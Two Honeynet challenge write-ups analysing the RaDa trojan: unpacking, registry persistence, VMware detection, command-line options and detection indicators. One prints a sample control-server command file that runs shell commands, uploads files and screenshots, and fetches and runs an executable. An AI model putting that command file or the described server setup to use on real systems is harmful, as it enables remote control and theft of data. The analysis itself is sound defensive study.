分享
 
 
 

Scan of the month 32 - September 2004

王朝c#·作者佚名  2006-12-16
窄屏简体版  字體: |||超大  

NO.1Honeynet Scan of the Month 32 AnalysisAuthor: Chris Eagle, cseagle at nps d0t edu

Answers to the challenge questions can be found here

Analyzing RaDa.zip, for Scan of the Month 32The Honeynet Scan of the Month Challenge for September 2004 invited participants to analyze a malware specimen distributed for the challenge as RaDa.zip (named after the program's authors Raul and David). The only information given in the challenge statement was:

'All we are going to tell you about the binary is that it was created to increase the security awareness around malware specimens and to point out the need of additional defensive countermeasures in order to fight current malware threats.'

Background: My preferred method of approaching a malware analysis is to do some preliminary investigation of the binary using simple tools such as file and strings to develop an idea of what to expect and then move into a purely passive analysis phase. My malware analysis platform of choice is a Windows workstation within IdaPro and cygwin utilities installed.

Obtaining the binary: The file RaDa.zip was downloaded from the Honeynet site and its integrity verified using both the md5sum and sha1sum tools available with cygwin. The file utility verified that RaDa.zip was indeed a zip file:

$ file RaDa.zip

RaDa.zip: Zip archive data, at least v2.0 to extract

and the single file contained within, RaDa.exe was extracted. The file utility was used again to categorize RaDa.exe as:

$ file RaDa.exe

RaDa.exe: MS-DOS executable (EXE), OS/2 or MS Windows

Preliminary analysis: Following confirmation that the malware file was a Windows executable, the strings utility was used to see if it could uncover anything interesting. With any Windows binary, it is always a good idea to scan for both 7-bit ASCII and 16 bit Unicode strings. The following ASCII strings were found (edited to show only initially interesting strings):

$ strings -a RaDa.exe

!This program is the binary of SotM 32..

KERNEL32.DLL

MSVBVM60.DLL

LoadLibraryA

GetProcAddress

ExitProcess

And, the following Unicode strings (note the use of the '-e l' option to search for 16 bit character strings, 'man strings' for more info) were found:

$ strings -e l RaDa.exe

VS_VERSION_INFO

StringFileInfo

040904B0

CompanyName

Malware

ProductName

RaDa

FileVersion

1.00

ProductVersion

1.00

InternalName

RaDa

OriginalFilename

RaDa

VarFileInfo

Translation

The most interesting fact learned from all of this is that the binary was probably written in Visual Basic based on its use of MSVBVM60.DLL (rather than MSVCRT0.DLL, the standard C library). MSVBVM60.DLL is described as: 'msvbvm60.dll is a module for the Microsoft Visual Basic virtual machine' by ProcessLibrary.com. An additional thing to note here is that binaries that yield so few strings often turn out to be protected by some form of obfuscator such as ASPack, or UPX. This knowledge helps us know what to expect when we take a closer look.

A More Detailed Look: The next thing I always do with a malware specimen is load it up in IdaPro. I am generally interested in answering the following questions:

What actions if any does the program take to 'install' itself. This includes actions such as copying itself to a new location and adding registry keys to launch the program at startup? What effort does the program make to communicate with the outside world? I am interested in these questions just in case I decide to actually run the program as part of testing it. Running the program is something I try to avoid entirely as an analysis technique. I generally only run malware sample once I know what to expect of them and when I can be sure that I can control them. In any case, if I do run them, they are always run on an isolated network.

When the file was loaded into IdaPro, Ida displayed a warning message (seen to the right) that the import table was located in a non-standard section and recommended reloading the binary in manual mode, which I did. Ida was able to disassemble only a single function 'start' at the entry point of the program. The fact that Ida was able to recognize so little code was also an indication that the binary had been obfuscated in some way. Based on personal experience, I immediately recognized the protection algorithm as that employed by the Universal Packer for Executables (UPX). It was also clear that the binary had been further obfuscated to remove some of the telltale signs of UPX packing. Namely the section names had been altered to JDR (the first initials of the first names of the authors of this month's scan) from UPX and the characteristic UPX packing notice placed at the beginning of each UPX compressed file had been overwritten with the following string:

!This program is the binary of SotM 32..

As a consequence of these actions, the original, uncompressed binary could not be recovered using UPX itself. While UPX is capable of compressing a binary, it is also capable of decompressing a UPX compressed binary in order to recover the original, uncompressed binary. This is done with the '-d' command line option to UPX. Unfortunately, if UPX detects that a binary has been tampered with, it will refuse to decompress the binary. In order to work with UPX protected binaries within IdaPro I had previously developed an IDC script specifically to unpack UPX binaries. The script mimics the UPX decompression routine and reconstructs the programs import table in a manner similar to UPX itself. A useful thing to do following execution of the decompression script is to have Ida rescan the binary for strings. If the decompression was successful, a fair number of new strings should be detectable. Because Ida has grouped data in ways that it prefers, it is useful to have Ida 'Ignore defined instructions and data' (see the figure to the right) when scanning for new strings. Also, since this is a Windows binary, it is useful to scan for Unicode strings in addition to standard C strings. Some results of the new strings scan appear in the figure below:

Tracing execution of the program following decompression is simply a matter of noting where the UPX decompression stub transfers control once it is finished. In this case we find the following instructions at the end of the decompression routine:

JDR1:0040FE77 loc_40FE77: ; CODE XREF: JDR1:0040FE30

JDR1:0040FE77 popa

JDR1:0040FE78 jmp near ptr dword_4018A4

So analysis continued at the instruction at location 0x04018A4 which unfortunately does not lead very far:

JDR0:0040189C j_Ordinal_0x64 proc near ; CODE XREF: JDR0:004018A9

JDR0:0040189C jmp ds:Ordinal_0x64

JDR0:0040189C j_Ordinal_0x64 endp

JDR0:0040189C

JDR0:0040189C ; ---------------------------------------------------------------------------

JDR0:004018A2 align 4

JDR0:004018A4

JDR0:004018A4 loc_4018A4: ; CODE XREF: JDR1:0040FE78

JDR0:004018A4 push offset dword_401994

JDR0:004018A9 call j_Ordinal_0x64

Here we see that the program immediately pushes a value then calls an imported library function. The key to continued execution must lie in the data that is pushed then, so examination continued at location 0x0401994. As seen in the following figure, this location begins with a VB5 marker indication a Visual Basic 5 compatible data structure. Location 0x0401994 is clearly not executable, so perhaps this data structure contains a pointer to the main function of the malware program. Following a little data reorganization some values stand out for potential exploration. The values contained in locations 004019C0, 004019C4, 004019E0, and 004019E4 all fall within the range of the JDR0 section of the program and may therefore point to executable portions of the program. As seen in the figure below, IdaPro displays the contents of the target locations whenever the mouse cursor is held over an address. In the case of address 4045D0h, it is clear (with a little reverse engineering experience) that a function prologue is present at that address, while no function prologues appear to be present at the other 3 pointer locations. As a side note, it is a useful reverse engineering skill to remember what the machine language representation of a function prologue looks like in order to be able to recognize function boundaries while looking at raw hex.

Transferring attention to program location 4045D0h and asking Ida to change the displayed data into first code, then a function yields the results in the following figure. I elected to rename the function VB_Main and considered this the true entry point to the program. While Ida was able to recognize calls to library functions (because the import table had been reconstructed), it was not able to recognize calls to functions that had not been properly analyzed yet.

The following lines show a case in which Ida does not yet know a function exists at the target of a call instruction:

JDR0:00404879

JDR0:00404879 loc_404879: ; CODE XREF: VB_Main+2A1

JDR0:00404879 call near ptr dword_404F40+70h

By asking Ida to convert the values around location 404F40h into code, a new function is discovered and the call instruction is transformed into the following:

JDR0:00404879 loc_404879: ; CODE XREF: VB_Main+2A1

JDR0:00404879 call sub_404FB0

sub_404FB0 appears in the following figure and the string reference begins to give us the sense that we are on the right track:

By analyzing each newly discovered function for similar unresolved call instructions additional functions are located until the start of every function contained in the file has been found and properly reformatted into a disassembled function listing. The final version of the IdaPro database file generated for this analysis can be found here (IDA 4.70 database format).

Behavioral Analysis: Once all of the functions within the program have been found, the behavior of each needs to be understood. The most interesting function initially if the once mentioned above, sub_404FB0. This function stands out because of its reference to many interesting strings including the following:

'HKLM\Software\Microsoft\Windows\CurrentVersion\Run\'

which is the name of a Windows registry key often used by malware to ensure that the malware is restarted each time a computer is rebooted. All programs listed under this key are started by Windows at system startup. Analysis of function sub_404FB0 shows that it largely performs initialization tasks for a number of string variables. For this reason I renamed the function Init_data. Another interesting string that gets referenced from this function is:

'HKLM\Software\VMware, Inc.\VMware Tools\InstallPath'

Which is a key used by VMWare to indicate the install location for 'VMWare Tools' within virtual machines running Windows as the guest operating system. IdaPro's cross-referencing features indicate every location from which a program variable is referenced. By making use of cross-referencing, the functions that refer to the two registry keys mentioned above are quickly located for analysis.

In the case of the 'Run' key, a function is found that performs a registry write to add RaDa.exe (or whatever it has been renamed to) to the list of programs run at system startup. In the case of the 'VMWare Tools' key, a function is found in which the malware tests for the presence of this key. From this it is inferred that the malware is actively looking to see if it is running within a virtual machine. Further analysis of the same function reveals that the malware makes use of the Windows WMI interface to iterate through each network interface and test whether the MAC address of the interface is one which belongs to VMWare as assigned by the IEEE and published in its list of 'Organizationally Unique Identifiers (OUI)/company Ids' (http://standards.ieee.org/regauth/oui/oui.txt). I dubbed this function 'check_for_vmware'.

Each function called by Init_data was examined in turn. One of the more revealing functions contained a large program loop that tested for a number of strings that each started with '--'. This function was dubbed parseArgs as it appeared to be a command line argument parser. The following is a table of command line arguments accepted by the program and their purpose.

Argument

Description

--visible

Causes Internet Explorer window to be displayed during command fetch operations

--verbose

Does nothing other than initialize a string: 'Starting DDoS Smurf remote attack...' there is no evidence that the binary actually performs a Smurf attack however.

--server <url base>

Specifies the base url of the remote command server which must be on a private subnet and must be refered to by IP rather than hostname. default: http://10.10.10.10/RaDa

--commands <file name>

Specifies the name of the remote command file to retrieve. default: RaDa_commands.html

--cgipath <path>

Specifies the name of the remote cgi directory. default: cgi-bin

--cgiget <name>

Specifies the name of the remote cgi script to invoke for downloading files to the infected victim. default: download.cgi

--cgiput <name>

Specifies the name of the remote cgi script to invoke for uploading files off of the infected victim. default: upload.cgi

--tmpdir <dir>

Specifies the name of the working directory to be used by the running program instance. default: C:\RaDa\tmp

--period <time>

Specifies the number of seconds the program waits between successive command cycles. default: 60

--cycles <num>

Specifies the number of command cycles the program should complete before exiting. default: 0 (0 == infinite)

--help

Causes the program to display a copyright notice in an Internet Explorer window.

--gui

Causes the program to display a gui control panel.

--installdir <dir>

Specifies the directory in which the program will install itself default: C:\RaDa\bin

--noinstall

Specifies that the program should not install itself permanently (do not copy exe or add registry key). default is to install

--uninstall

Specifies that the program should uninstall itself by deleting its exe and removing its registry key.

--authors

Causes the program to open a dialog box listing the authors of the program. The dialog box will only be displayed if the check_for_vmware function indicates that the program is not running in a virtual machine.

Any other command line arguments cause the program to display the --help message and quit.

Once program data has been initialized by the Init_data function, control return to VB_Main which immediately calls a function I named 'command_loop'. If uninstall was specified, command_loop removes the program and terminates. If noinstall was NOT specified, then command_loop installs the program. Control then passes to a loop that executes the number of times specified by the --cycle argument. Each pass through the loop invokes a call to a function I named 'execute' and then causes the program to sleep in accordance with the --period argument.

The execute function lies at the heart of this program. Analysis of the execute function reveals what the program is actually capable of. The function begins with a series of tests to ensure that the remote command server lies on a private subnet. The function then invokes an Internet Explorer Application object to download the remote command file whose URL is specified by <server>/<commands>. If the --visible flag was set, then the command file will be displayed in an Internet Explorer window. Once the file has been retrieved, the function iterates through a list of form elements contained within the html document. The name of each form element is tested to see if it represents a valid command to the program. The program recognizes the following commands:

Command

Argument

Description

exe

<cmd>

run the specified command using '%COMSPEC% /C <cmd>'

get

<filename>

invoke <server>/<cgipath>/<cgiget> to download <filename> from <server> to the victim's <tmpdir>

put

<filename>

invoke <server>/<cgipath>/<cgiput> to upload <filename> from the victim to <server>

screenshot

<filename>

saves a bmp image of the victim's screen into the named file in <tmpdir>

sleep

<duration>

causes the program to sleep for the specified time. This is in addition to the delay introduced by the --period option

Each of the commands above requires a single parameter that is taken from the value field of the form element used to specify the command. An example command file is shown below:

<head></head>

<body>

<form name=commands method=POST action=xyz.bin>

<input type='Hidden' name='exe' value='dir c:\ > dir.txt'>

<input type='Hidden' name ='put' value='dir.txt'>

<input type='Hidden' name='exe' value='del dir.txt'>

<input type='Hidden' name ='get' value='update.exe'>

<input type='Hidden' name='exe' value='update.exe'>

<input type='Hidden' name ='screenshot' value='screen.bmp'>

<input type='Hidden' name ='put' value='screen.bmp'>

<input type='Hidden' name='exe' value ='del screen.bmp'>

</form>

</body>

</html>

The commands above instruct the program to:

dump a directory listing into a file named dir.txt upload dir.txt to <server> delete the directory listing file download a file named 'update.exe' from <server> execute the newly downloaded file 'update.exe' capture a screen shot of the victim computer upload the screen shot to <server> delete the screen shot from the victim computer If the command file that resides on <server> is updated during the period between cycles, then the program can be made to execute a new command set in the following execution cycle.

Additional analysis of the program indicates that the file upload portion of the code was lifted from this example: http://www.motobit.com/tips/detpg_uploadvbsie.htm. This was discovered by conducting an internet search for the following piece of text found in the program:

'Copyright (C) 2001 Antonin Foller, PSTRUH Software'

The discovery of this script made reverse engineering several functions much easier.

Behavioral Observation: Sufficient static analysis was performed to develop a good idea of the expected behavior of the program. In order to confirm my findings, the program was allowed to run in an instrumented lab environment. A web server was configured to accept requests from the program and all of the command line options noted previously were exercised. Because of the VMWare checks performed by the program, I elected to run it on a laptop running Windows 2000 rather than within a virtual machine. It should be noted however that all of the VMWare checks performed by the program can be defeated with the following steps:

Uninstall VMWare Tools if they are installed in your VM Change the MAC address of the virtual adapter in your guest operating system. Steps for how to do this were posted to the Honeypots mailing list here: http://www.securityfocus.com/archive/119/361359/2004-04-20/2004-04-26/2 With those changes made, the program will happily tell you who its authors are even when running within a virtual machine.

Programs used to instrument test runs of RaDa include the following:

Filemon to monitor file system activity. Regmon to monitor registry activity. Regshot to measure changes to the registry.

Ethereal to monitor network activity (requires winpcap for Windows users) The following test runs were performed with any graphical output displayed to the right of the command used to generate it::

RaDa --noinstall --help

RaDa --noinstall --gui

RaDa --noinstall --authors

RaDa --noinstall --server http://192.168.0.202

Ethereal was used to capture network traffic and several different HTTP connections were observed:

Request for RaDa_commands.html - the commands in this file are then executed resulting in two additional HTTP requests

Request ro download file 'update.exe' Request to upload file 'dir.txt'

RaDa --server http://192.168.0.202

The purpose of the command above was to observe the installation process of the program. Regmon and Filemon were used to monitor registry and file system activity respectively and Regshot was used to perform a before and after snapshot comparison of the registry. The amount of data gathered by Regmon and Filemon can be overwhelming. Both utilities offer some filtering capability, but I find it easier to save the data from each program to text files that I can search easily. Regshot is an excellent tool to assist in data reduction as it focuses strictly on changes to the registry.

Relevant Regmon data showing the addition of a 'Run' key value to launch RaDa on startup. Useful things to key on are 'CreateKey' and 'SetValue' events.

Relevant Filemon data showing first the creation of the install directories and second the copying of RaDa.exe from its original location to the specified install location. Useful things to key on are 'CREATE' and 'WRITE' events.

A RegShot comparison detailing the changes made to the registry following execution of RaDa. Note the first item under 'Values added'.

RaDa --uninstall

Similar instrumentation was performed during the uninstall process. It was observed that while the program does delete itself from its installed location, and it does remove the registry value used to launch the program on system startup, it does not remove the directory hierarchy created to support the program.

Indications that RaDa may be present or running on a system:

The following items are indications that RaDa may be present on a system

RaDa.exe observed in Task Manager Unexplained instances of IEXPLORE.exe observed in Task Manager The presence of the directory: C:\RaDa The presence of a registry value in the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run that points to RaDa.exe Periodic uncommanded HTTP requests observed for file 'RaDa_commands.html'

Cleaning RaDa from a system:

One method is to ask RaDa to remove itself: RaDa --uninstall

The manual method consists of the the following steps: Locate and delete the RaDa binary which by default will reside in C:\RaDa\bin. Using regedit, navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and delete the value that points to the RaDa binary. Kill the RaDa process using Task Manager. You may also need to kill an IEXPLORE process. Make sure all visible instances of Internet explorer are closed, then kill any IEXPLORE processes that remain listed in Task Manager. References: cywin utilities - http://www.cygwin.com exe and dll identification - http://www.processlibrary.com IdaPro Disassembler - http://www.datarescue.com/idabase Ultimate Packer for Executables - http://upx.sourceforge.net Organizationally Unique Identifiers (OUI) - http://standards.ieee.org/regauth/oui/oui.txt Changing MAC addresses in a VM - http://www.securityfocus.com/archive/119/361359/2004-04-20/2004-04-26/2 Filemon - http://www.sysinternals.com/ntw2k/source/filemon.shtml Regmon - http://www.sysinternals.com/ntw2k/source/regmon.shtml Regshot - http://the7thlab.shyper.com/bbs/tianwei/ Ethereal - http://www.ethereal.com Winpcap - http://winpcap.polito.it/

No.2

Scan of the month 32 - September 2004Table of contents Intro Downloading RaDa Observing the binary Setting up a secure environment Starting with RaDa ? Install Watch Taking a closer look - Ethereal Setting up a test network Commands upload.cgi download.cgi Commandline options Observing the Code Unpacking RaDa Assembly analasis Creating a Snort Rule Conclusion Answering the questions Question 1 Question 2 Question 3 Question 4 Question 5 Question 6 Question 7 Question 8 Bonus Question 1 Bonus Question 2 IntroThrough the honeypots maillist we saw that there was another SotM (Scan of the Month) contest, number 32 already. Like always we were thinking about participating in it, to learn from it and to see if we could solve the questions. But where it most of the times went wrong in having no time for it we decided this time that we would make time for it. We know each other for quite some time now (from drinking beer together ;-)), and wanted to work on it together as a team.

Who we are? We are: Wim Koomen (22 years old, Netherlands),

Thijs Bosschert (22 years old, Netherlands) and

Bas Bosschert (26 years old, Netherlands)

We are all studying and working in IT related fields, and are all interested in security.

Return to Table of contentsDownloading RaDaSince we were going to work with malware we had to be careful. We downloaded RaDa on our fully patched Linux machine to be sure it couldn't harm our network. And we tried to determine if we downloaded the right binary using the MD5 and SHA1 strings.

Looks like we downloaded the right file. Next we unpacked the binary on Linux and we did a strings dump of the file to see if we could find anything useful.

This showed us a couple of usable strings like KERNEL32.DLL and MSVBM60.DLL. The file is very likely malware for the Windows Operating System written in Visual Basic 6 so we moved the binary to our Windows environment where we could work with it.

Return to Table of contentsObserving the binarySetting up a secure environmentBecause we didn't want to run RaDa.exe on our own production machines we decided that we would set up a secure controlled environment. The first machine we used for this job was a PII-366Mhz laptop with 512MB memory. Because it was unclear at this time what the binary would do, we created multiple environments and for each of these environments we created an image with 'Symantec Ghost'.

The operating system of our choice in this case was Microsoft Windows 2000. We installed it on the laptop and as soon as this was done we made an image of the setup. After this clean install we patched the system by running the SP4 install. Now we had two installs, one with SP4 and one without but because Microsoft released several patches after the release of SP4 we also had to create an image with the new patches installed. Finally three images were made, being the following:

Windows 2000 - standard install Windows 2000 - with SP4 Windows 2000 - with SP4 and fully patched using Windows update The first image we started working with was the Windows 2000 standard install, if the RaDa binary used any vulnerability it would certainly be present in the standard Windows 2000 install. Because we still didn't know what the binary would do exactly we decided not to connect the machine to the network yet, but keep it standalone.

Starting with RaDa ? Install WatchWith the secure environment in place and the machine ready it was time to take a first look at running the binary. The first thing we did was running the binary while using 'InstallWatch'.

“Install Watch records modifications made to your PC during the installation of software, hardware, or configuration changes.”The binary itself showed us no signs that it was doing anything. But InstallWatch showed us a flurry of activity. The first thing that was registered was RaDa creating a directory on the C: root.

It then copied itself to the following file:

Besides the creation of the directories and the cloning the binary also made itself a registry key in:

Taking a closer look - EtherealBecause RaDa didn't give us any output on the screen we decided to have a look at the network traffic it might output. We did an install of Ethereal the network protocol analyzer on our test environment and tried to see if RaDa attempted any network connections. Before we started the sniffing we killed the RaDa.exe process, turned on the sniffing, started the RaDa.exe binary again and looked at the network traffic it was generating. The first thing it tried was to get an address for the 10.10.10.10 IP. This was the only traffic we were able to see with Ethereal at this time. The machine wasn't connected to the network so this request didn't get answered. We decided to set up a little test network to see if we could get more information out of this.

Setting up a test networkRunning RaDa on a stand alone machine showed us that we needed a network. So we built a small network with the infected Windows 2000 machine, another unpatched Windows 2000 machine and a Linux machine. On the infected Windows 2000 machine we ran Ethereal and on the Linux machine we used tcpdump to dump all trafic. Now it was time for the big moment. We started RaDa and saw several ARP requests asking who has 10.10.10.10. So, time to change the IP of our Linux machine to 10.10.10.10

We watched our network traffic again and noticed that RaDa tried to connect to 10.10.10.10. This time it found the machine and was talked to the HTTP port (80). We didn't have anything running on this port, so we started up netcat and let it listen on port 80.

We can see RaDa sending a normal HTTP request, so we decided to install Apache and create a /var/www/RaDa/RaDa_commands.html. We notice RaDa request the file every minute and doing nothing besides that. At first sight RaDa looks like a trojan, which gets his commands from the HTML file.

CommandsNow it's time to find out how we can give commands to RaDa. We tried lost of commands ourselves which we thought would work, but non of them did. After looking at some string dumps again we remembered that we saw something about forms, name and value. Looking the code back up again gave use:

We can see Document.Forms.elements. And if we look further we see the strings 'Name' and 'Value'. So we had to built a form and use the name option for the command and the value option for the argument, this is what we assumed. We looked further in the code and can see the strings 'get', 'put', 'sleep', 'screenshot', 'exe'. Bringing the pieces of the puzzle together we came up with some options of a html file, and testing with it we came to the following HTML file.

We ran RaDa again and this time it actually made a screenshot and wrote screenshot.bmp to the C:\RaDa\tmp directory. We tested the other commandos and they all works like a charm. So RaDa is a trojan and with the RaDa_commands.html we are able to execute commandos on the infected machine.

The commands that can be done are:

All the commands use variables, which are:

After we figured out how RaDa gets its commands from the server and which commands were available we decided to build a working upload and download script with which RaDa can communicate. RaDa will try to use those scripts when it receives a 'put' or 'get' command.

upload.cgiFirst we created the upload script. Using Ethereal we captured the HTTP requests RaDa makes when it attempts to upload a file to the server.

The requests RaDa makes is a regular upload request, so it wasn't that hard to create an upload.cgi. We decided to let the perl CGI module handle the upload and came up with the following upload.cgi script.

download.cgiAfter we completed the upload.cgi script which worked like a charm we didn't expect the download.cgi script to pose any problems. However as we quickly found out, this wasn't the case. RaDa uses the Internet Explorer object to handle its HTTP requests and Internet Explorer will always ask for permission to download a file that it can not show in the browser window. This ofcourse will ring alarm bells with the user who is suddenly presented with a file download dialog. There had to be an other way to do this without alarming the user and after a look in the assembly dump we indeed found a piece of code which we thought could be very interesting.

After RaDa sends his request we see a reference to Document.body.innerText which is the Microsoft's DOM way of saying all parsed text within the body node. But we can't just dump binaries as plain text this will totally ruin the alignment of the binary beyond repair. So we had to look further in the assembly dump for more hints.

Looking at those strings we recognized uuencoding which starts with a 'begin' and ends with an 'end' string. Knowing this we started to build a download script.

We tested this script with a simple textfile and it worked. Downloading a text file is nice but not very useful if you wanna make use of this trojan. So we tried to download a binary. We had a screenshot.bmp file on the server, which we uploaded earlier. With the above code we failed to download the binary. We started RaDa with the --visible option and we noticed immediately where RaDa goes wrong. Internet Explorer still parses HTML within a 'pre' element. Knowing this we have to find something else which bypass Internet Explorers HTML parser. Finally we figured out that text within a 'textarea' element doesn't get parsed. So we changed our code to its final version.

Downloading of the screenshot.bmp file now works. A text file is fun, a screenshot even more fun, but what about an executable file. We uploaded calc.exe and tried to download it. Downloading worked somehow. It did write a file, but not the complete file. We opened RaDa again with the --visible option and the uuencoded text looked fine to us. RaDa probably fails on a null byte, but it was impossible to determine the exact reason of failure.

Command-line optionsFrom the strings in the binary dump we saw that there were multiple -- strings. These looked like command-line options for the binary to us. So we decided to check if these were command-line options and what they would do.

The command-line options we found in the strings were:

The first command we wanted to try was --gui. So we opened a dos-box with cmd.exe and went to C:\RaDa\bin\, from there we tried the command

It was a command-line option indeed, because it showed us an interface to the binary. We saw the following on our screen:

The --gui option seemed to give us the interface (GUI) of the binary. It gave us the name of the binary, the challenge name, the date it was made, and the names of the makers of the binary, which are the same people who are the judges for this challenge (hello Raul and David). Then there were six buttons we could push, named:

The ?Install? button does the same thing as RaDa.exe does in the beginning when it is started for the first time and without the ?gui option, the making of the directories, the copying of the file and the adding of the registry key.

The ?Uninstall? button tries to uninstall RaDa.exe, which only works if it is being run from another place than the default install directory. Because it can?t remove itself when it is still active. The Uninstall option removes the RaDa.exe file and also the registry key.

The ?Show config? button opens an Internet Explorer window with as title ?RaDa Current Configuration?. The only thing in this window is the following text:

The ?Show usage? button gives almost the same window as the Show config button. Only with the title ?RaDa Usage?

The ?Exit? button just quits the program.

Then we have one button left, the ?Go!? button, this one starts the normal behavior of RaDa.exe like it would have done when it wasn?t started without the command-line option ?--gui?.

After having taking a look at the -- gui command-line, we tested all the command-line options one by one. Some of them needed arguments, others were just commands. The command-line options we found out and what they do are:

Default: download.cgi

Default: cgi-bin

Default: upload.cgi

Default: RaDa_commands.html

Default: 0

The --gui option gives a GUI with multiple options, which are explained above.

Default: \bin

Default: 60

Default: http://10.10.10.10/RaDa

Default: \tmp

The --visible option shows an Internet Explorer window with the output from the request it does to the server with the RaDa commands. It opens a new Internet Explorer windows each time RaDa does a request.

Return to Table of contentsObserving the CodeUnpacking RaDaWhen we tried loading the binary into our disassembler we got a warning that it was very likely the binary was packed. We kept this warning at the back of our heads when we quickly scanned the code manually. After a quick scan over the code we could easily determine that this was indeed a packed binary. The data segment of the code was much larger than the actual code segment, something which is virtually always the case for packed binaries.

Packed binaries use an algorithm to reduce their size so they will take up less disc space. Another reason to do this, and this is especially relevant for the RaDa executable, is that they're more difficult to analyse since the main program code is not visible in a disassembler. However there is a catch. Packed binaries can not be run when they're still in their packed state, so the first thing that the binary needs to do is unpack itself. Therefore the first code that will be run when the binary is started is the unpacking code this code will move the data it's unpacking into memory. After it's done unpacking the code pointer will jump to the entry point of the original program and the program will run like it has never been packed.

Before we could do any serious analysing ourselves we had to get the code in its unpacked state. At this point we weren't sure yet if the packing was done using a known packer or a custom written one. To test this we used a program called 'PEiD'.

“PEiD detects most common packers, cryptors and compilers for PE files. It can currently detect more than 450 different signatures in PE files.”PEiD output:

So PEiD determined that the binary used the UPX packing method. This is convenient since UPX offers us an easy method to unpack the binary. However when we tried this UPX gave us an error message telling that it could not unpack the binary.

This could mean two things, either PEiD made a mistake determining the packing method or more likely in this case, the binary has been mangled with to stop it from being unpacked this way.

We had to unpack this binary using an alternative method. Loading the binary in the OllyDBG debugger we determined the two relevant memory sections, they were named JDR0 and JDR1. The debugger showed that the unpacking code was located in JDR1 so that means the final code will be unpacked in JDR0. JDR0 had a range from 401000h till 40C0000h so any jump or call to this range from the unpacking code will mean the real code starts there, we call this the original entry point (OEP). Setting a breakpoint just before the code goes to the OEP will leave us with the unpacked code in memory. Now we only have to dump the process memory to file, for this we use OllyDump. All is not well though, the import table and the entry point of the binary are still set to the old unpacked state. To get this fixed we use 'importRec'. Which records the import table of the running program and applies this to our dumped binary. After this is done we have our binary in an unpacked state ready to be analysed.

Looking at a random other program packed using UPX we noticed the similarities between this and RaDa.exe. Suddenly it struck us, we have taken the difficult road, everything we have done to unpack this binary could have been avoided if we just replaced all instances of JDR by UPX and 9.99 by 1.92 using a hex editor like the authors of this executable have done the other way around. And indeed after doing this the UPX program had no problem unpacking the binary and it left us with the clean unpacked RaDa.exe executable.

Return to Table of contentsAssembly analasisTo make sure we completely understand the purpose and all features in the RaDa binary we have to make a good as possible analysis of the assembly dump. This means reading and following the code in a debugger and disassembler. As a debugger we use OllyDBG and for the disassembly we use IDA pro. After loading the unpacked binary in IDA pro we tried to find some hints on where it's best to start with our analysis. In the stringdump we found the following string:

After a search for this string it eventually brought us to a page about Uploading a file using IE+ADO without user interaction this is of course very interesting for a trojan so we decided to see if we could find the code in our binary. And after some code scanning we could indeed find most subroutines of this script back in our binary. The only subroutine we weren't able to find was the 'wait' subroutine.

This can be easily explained since this code will give a popup message with the amount of seconds the user still has to wait before the file is uploaded. A trojan would of course never want to inform the user about its actions. So it's very likely this function got stripped from the program.

From this we could determine with certainty that part of the trojan involved uploading files to a remote server.

Since we now had a little point to hold on to we tried to find functions that made calls to any of those functions we already determined. In IDA pro this is very easy with the option 'Display chart to xrefs to current identifier'. Using this option we found that the subroutine which IDA had given the name 'sub_407470' made a call to do_vbsUpload(). Checking the rest of this code in the subroutine we renamed it 'putFileOnHTTPServer'. When we used the same method as describes above for this function we could trace our way back to the subroutines that handles all the commands the trojan accepts from the server 'put', 'get', 'exe', 'screenshot' and 'sleep'.

Another part of the code seemed to deal with the detection of VMware we found references to registry keys and MAC addresses on VMware although when we tried this binary under VMware nothing out happened even when we followed the code flow as if it was without VMware. The only situation where it gave odd results is when we used the -authors option on our binary. The code to the VMware check and the -authors command line option seemed interlinked. A bug maybe?

After scanning the full code we could name and determine the use of most the functions and subroutines in the binary. Below is a list with the address in within the binary, the name we gave it and the purpose we think it has.

Start Address Name Purpose 00404BA0

cloneAndSetRegKey

Makes copy of self and sets the registry startup key

00404D80

unCloneAndUnsetRegKey

Removes copy of self and removes the registry startup key

00404FB0

init

Sets initial default values and starts main functions

004052C0

readCommandFromServer

Reads the commands from the specified server

00405A80

showUsage

Gets run when Show Usage in the --gui is clicked

00405E40

cycleCommandlineCommands

Checks for command line options

004062F0

showConfig

Gets run when Show Config in the --gui is clicked

004066B0

runProgram

Starts up an external program which is specified by 'exe' command

00406840

getFileFromHTTPServer

Downloads a file from the HTTP server. File is specified by 'get' command

00407470

putFileOnHTTPServer

Uploads a file to the HTTP server. File is specified by 'put' command

004076F0

do_vbsUpload

Main function for the method to upload a file on the server

004077D0

UploadFile

Part of upload script mentioned above

004078F0

BuildFormData

Part of upload script mentioned above

00408360

IEPostBinaryRequest

Part of upload script mentioned above

00408780

mpFields

Part of upload script mentioned above

00408B40

StringToMB

Part of upload script mentioned above

00408D60

InfoEcho

Part of upload script mentioned above

00409050

CheckRequirements

Part of upload script mentioned above

00409220

CheckOneObject

Part of upload script mentioned above

00409540

uuDecodeAndSaveFileToDisk

uudecodes the received file and saves it to disc

0040A2F0

makeScreenshot

Will make a screenshot in BMP and places file on disc

0040A5F0

goToSleep

Will make the trojan sleep for a while as in the 'sleep' command

0040AAA0

checkVmWare

Will check for the presence of VMware (but never gets called)

0040B010

showAuthors

Will show a messagebox with the name of the authors

0040B010

showAuthors

Will show a messagebox with the name of the authors

0040B160

checkTmpDir

Checks if tmp directory is present and writable

Using the above table we were able to determine the complete flow of the trojan by following the code when it ran in our debugger.

Return to Table of contentsCreating a Snort RuleOne of the questions is to develop a Snort signature to detect this kind of malware. The Snort has to be as generic as possible, so other similar specimens could be detected as well but at the same time we have to avoid a high false positives rate. Since we never worked with Snort or knew about the possibilities of Snort this question was a nice way to jump into the deep waters of Lake Snort. We started out with a simple Snort rule to detect packages that want to go to the IP adress 10.10.10.10 on port 80.

But this could give false positives if 10.10.10.10 is a valid website and someone wants to visit it. So we changed the rule a bit to match the RaDa_commands.html string.

This is a nice rule for this type of worm but since this worm has several command line options which give us the possibilty to change the server location or the location and name of the command file it's not all that useful. In other words it is easy to bypass this Snort rule with RaDa. Knowing the changing variables of RaDa leaves us with the following rule.

This means that every HTTP request from the internal network will give us a positive, of which most will probably be false positives. This is really not what we want. So we have to find something that is hardcoded in RaDa and can't be changed by command options. Let's take a look at the different HTTP requests

This is the request to the commands file of RaDa. Most of it is generated by Internet Explorer, so it is useless for our Snort rule. The /RaDa/RaDa_commands.html can be changed with the command options, so we have nothing in this request we can use for our rule. Let's see the answer of this request.

Here we have something to work with. We can give RaDa several commands. All of these commands are hardcoded in the binary. The commands are screenshot, sleep, get, put and exe. We can filter on this commands with the following rule.

